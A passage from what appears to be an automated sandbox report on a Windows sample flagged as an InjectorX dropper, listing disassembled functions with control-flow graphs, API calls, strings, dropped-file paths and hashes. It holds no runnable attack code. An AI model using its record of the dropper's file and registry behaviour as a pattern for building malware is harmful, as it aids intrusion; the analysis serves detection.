                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 717251189-905382516
                                            • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                            • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                            • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                            • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 563 40176f-401794 call 402c37 call 405b94 568 401796-40179c call 40624c 563->568 569 40179e-4017b0 call 40624c call 405b1d lstrcatW 563->569 574 4017b5-4017b6 call 4064e0 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 40658f 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d19 580->581 582 4017fd-401819 call 405d3e 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052b0 call 4030fa 582->591 587->580 588->587 592 401820-40185e call 40624c * 2 call 40626e call 40624c call 4058ae 590->592 593 40186f-401879 call 4052b0 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 625 401864-401865 592->625 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ac8 605->608 611 4018e1-4018e4 607->611 612 402abf-402ac2 607->612 613 402aca-402ace 608->613 615 4018e6-4018f7 call 40626e lstrcatW 611->615 616 4018f9-4018fc call 40626e 611->616 612->608 622 401901-4022f6 call 4058ae 615->622 616->622 622->612 622->613 625->605 627 401867-401868 625->627 627->593
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                            • API String ID: 1941528284-4034930087
                                            • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                            • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                            • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                            • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                            Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 635 405310-405314 632->635 636 4052f5-405305 lstrlenW 632->636 633->632 638 405323-405327 635->638 639 405316-40531d SetWindowTextW 635->639 636->631 637 405307-40530b lstrcatW 636->637 637->635 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                            APIs
                                            • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                            • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                            • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                            • SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Completed
                                            • API String ID: 2531174081-3087654605
                                            • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                            • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                            • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                            • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                            Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 643 4065b6-4065d6 GetSystemDirectoryW 644 4065d8 643->644 645 4065da-4065dc 643->645 644->645 646 4065ed-4065ef 645->646 647 4065de-4065e7 645->647 649 4065f0-406623 wsprintfW LoadLibraryExW 646->649 647->646 648 4065e9-4065eb 647->648 648->649
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                            • wsprintfW.USER32 ref: 00406608
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                            • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                            • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                            Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 650 4030fa-403111 651 403113 650->651 652 40311a-403122 650->652 651->652 653 403124 652->653 654 403129-40312e 652->654 653->654 655 403130-403139 call 4032f5 654->655 656 40313e-40314b call 4032df 654->656 655->656 660 403151-403155 656->660 661 403296 656->661 662 40315b-40317b GetTickCount call 406787 660->662 663 40327f-403281 660->663 664 403298-403299 661->664 674 4032d5 662->674 676 403181-403189 662->676 665 403283-403286 663->665 666 4032ca-4032ce 663->666 668 4032d8-4032dc 664->668 669 403288 665->669 670 40328b-403294 call 4032df 665->670 671 4032d0 666->671 672 40329b-4032a1 666->672 669->670 670->661 684 4032d2 670->684 671->674 677 4032a3 672->677 678 4032a6-4032b4 call 4032df 672->678 674->668 681 40318b 676->681 682 40318e-40319c call 4032df 676->682 677->678 678->661 686 4032b6-4032c2 call 405df0 678->686 681->682 682->661 689 4031a2-4031ab 682->689 684->674 693 4032c4-4032c7 686->693 694 40327b-40327d 686->694 691 4031b1-4031ce call 4067a7 689->691 696 4031d4-4031eb GetTickCount 691->696 697 403277-403279 691->697 693->666 694->664 698 403236-403238 696->698 699 4031ed-4031f5 696->699 697->664 702 40323a-40323e 698->702 703 40326b-40326f 698->703 700 4031f7-4031fb 699->700 701 4031fd-40322e MulDiv wsprintfW call 4052b0 699->701 700->698 700->701 708 403233 701->708 706 403240-403245 call 405df0 702->706 707 403253-403259 702->707 703->676 704 403275 703->704 704->674 712 40324a-40324c 706->712 710 40325f-403263 707->710 708->698 710->691 711 403269 710->711 711->674 712->694 713 40324e-403251 712->713 713->710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                            • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                            • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                            • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                            Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 714 40577f-4057ca CreateDirectoryW 715 4057d0-4057dd GetLastError 714->715 716 4057cc-4057ce 714->716 717 4057f7-4057f9 715->717 718 4057df-4057f3 SetFileSecurityW 715->718 716->717 718->716 719 4057f5 GetLastError 718->719 719->717
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                            • GetLastError.KERNEL32 ref: 004057D6
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                            • GetLastError.KERNEL32 ref: 004057F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 3449924974-224404859
                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                            • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                            • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                            Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 720 405d6d-405d79 721 405d7a-405dae GetTickCount GetTempFileNameW 720->721 722 405db0-405db2 721->722 723 405dbd-405dbf 721->723 722->721 724 405db4 722->724 725 405db7-405dba 723->725 724->725
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405D8B
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589), ref: 00405DA6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76
                                            • nsa, xrefs: 00405D7A
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1269705395
                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                            • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                            • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                            Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 726 401c19-401c39 call 402c15 * 2 731 401c45-401c49 726->731 732 401c3b-401c42 call 402c37 726->732 734 401c55-401c5b 731->734 735 401c4b-401c52 call 402c37 731->735 732->731 738 401ca9-401cd3 call 402c37 * 2 FindWindowExW 734->738 739 401c5d-401c79 call 402c15 * 2 734->739 735->734 751 401cd9 738->751 749 401c99-401ca7 SendMessageW 739->749 750 401c7b-401c97 SendMessageTimeoutW 739->750 749->751 752 401cdc-401cdf 750->752 751->752 753 401ce5 752->753 754 402abf-402ace 752->754 753->754
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                            • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                            • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                            • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                            Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 757 4023de-40240f call 402c37 * 2 call 402cc7 764 402415-40241f 757->764 765 402abf-402ace 757->765 766 402421-40242e call 402c37 lstrlenW 764->766 767 402432-402435 764->767 766->767 770 402437-402448 call 402c15 767->770 771 402449-40244c 767->771 770->771 775 40245d-402471 RegSetValueExW 771->775 776 40244e-402458 call 4030fa 771->776 779 402473 775->779 780 402476-402557 RegCloseKey 775->780 776->775 779->780 780->765 782 402885-40288c 780->782 782->765
                                            APIs
                                            • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402469
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
